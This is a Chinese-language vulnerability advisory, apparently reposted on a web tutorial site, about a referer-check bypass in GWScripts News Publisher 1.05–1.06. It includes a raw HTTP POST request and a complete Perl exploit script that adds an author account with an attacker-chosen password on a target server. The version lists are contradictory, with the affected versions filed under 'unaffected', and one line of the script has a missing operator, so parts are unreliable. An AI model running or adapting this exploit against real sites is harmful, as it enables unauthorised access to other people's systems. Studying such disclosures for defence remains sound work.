GWScripts News Publisher 作者索引文件写入漏洞
2008-04-09 04:32:17来源:互联网 阅读 ()
发布日期:2000-08-31
更新日期:2000-08-31
受影响系统:
不受影响系统:
GWScripts News Publisher 1.06
GWScripts News Publisher 1.05b
GWScripts News Publisher 1.05a
GWScripts News Publisher 1.05
描述:
GWScripts News Publisher 是 web 新闻发布软件。它存在一个漏洞,致使
远程用户可以向作者索引文件(author.file)中加入作者。具体做法是,用任
意的用户名和口令提交如下的 HTTP 请求:
POST /cgi-bin/news/news.cgi?addAuthor HTTP/1.0
Connection: close
User-Agent: user/browser
Host: target
Referer: http://target/cgi-bin/news/news.cgi
Content-type: application/x-www-form-urlencoded
Content-length: 71
author=<username>&apassword=<password> \
&email=<email address>&name=<username>&password=<password>
<* 来源:n30 (n30@cgi-experts.com) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/perl
#
# News Publisher EXPLOIT by n30
# Versions: tested on 1.05
# 1.05a
# 1.05b
# 1.06
# Bug Found By: me {n30}
# OS: Unix and Winnt
#
# The Problem:
# The author decided in all his 'enlightened wisdom'
# that if the HTTP_REFERER url is the same as the News Publisher
# news.cgi file. Then U have OBVIOUSLY logged in?
#
# Exploit:
# hmmm me thinks i should change the HTTP_REFERER to:
#
# http://www.server.com/cgi/news.cgi
#
# Using this exploit will add an author account with user kid
# and passwerd of ur choice.
#
# NOTE: There are more inventive ways to use this Vulnerability :)
# ie. maybe?? the Admin screen is protected by the HTTP_REFERER?
#
# n30@alldas.de
# www.alldas.de, defaced.alldas.de {trib's the webmaster not me!}
#
# Shoutz: trib, axess, domz, acidflame, raxie, and all who know me!
#
use strict;
use Socket;
print("\nNews Publisher EXPLOIT\n");
print("By: n30 {n30\@alldas.de}\n");
print("\nShoutz: trib, axess, domz, acidflame, raxie\n");
if (@ARGV < 3) {
print("\nUsage: $0 <target> <dir> <newpass>\n");
print("\n eg => ./sploit.pl www.example.com cgi-bin/news.cgi
iisalamer\n");
exit(1);
}
(my $target,my $dir,my $newpass) = @ARGV;
# Setup Content-Length Header :)
my $length = 68 (2 * length($newpass));
# Print BullShit
print("\nRemote host: $target\n");
print("CGI-script: $dir\n");
print("URL: http://$target/$dir\n");
# Setup URL Command
my $url =
"author=kid&apassword=$newpass&email=lamerz\@antionline.com&name=kid&passwor
d=$newpass";
print("URL Command: $url\n");
# Necessary to DE-Kiddie da werld :)
my $agent = "-=Attention Admin=- pLz n0te d0wn th1s IP and P4ss ont0 fBi";
my $sploit=
"POST /$dir?addAuthor HTTP/1.0
Connection: close
User-Agent: $agent
Host: $target
Referer: http://$target/$dir
Content-type: application/x-www-form-urlencoded
Content-length: $length
$url";
my $iaddr = inet_aton($target) || die("Error: $!\n");
my $paddr = sockaddr_in(80, $iaddr) || die("Error: $!\n");
my $proto = getprotobyname('tcp') || die("Error: $!\n");
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
send(SOCKET,"$sploit\015\012", 0) || die("Error: $!\n");
close(SOCKET);
print("\nWh0a chex0r: http://$target/$dir\nuser/pass: kid/$newpass\n");
exit(0);
#end of exploit
建议:
暂无
标签:
版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有
下一篇:Stalkerlab
IDC资讯: 主机资讯 注册资讯 托管资讯 vps资讯 网站建设
网站运营: 建站经验 策划盈利 搜索优化 网站推广 免费资源
网络编程: Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
服务器技术: Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护
软件技巧: 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷
网页制作: FrontPages Dreamweaver Javascript css photoshop fireworks Flash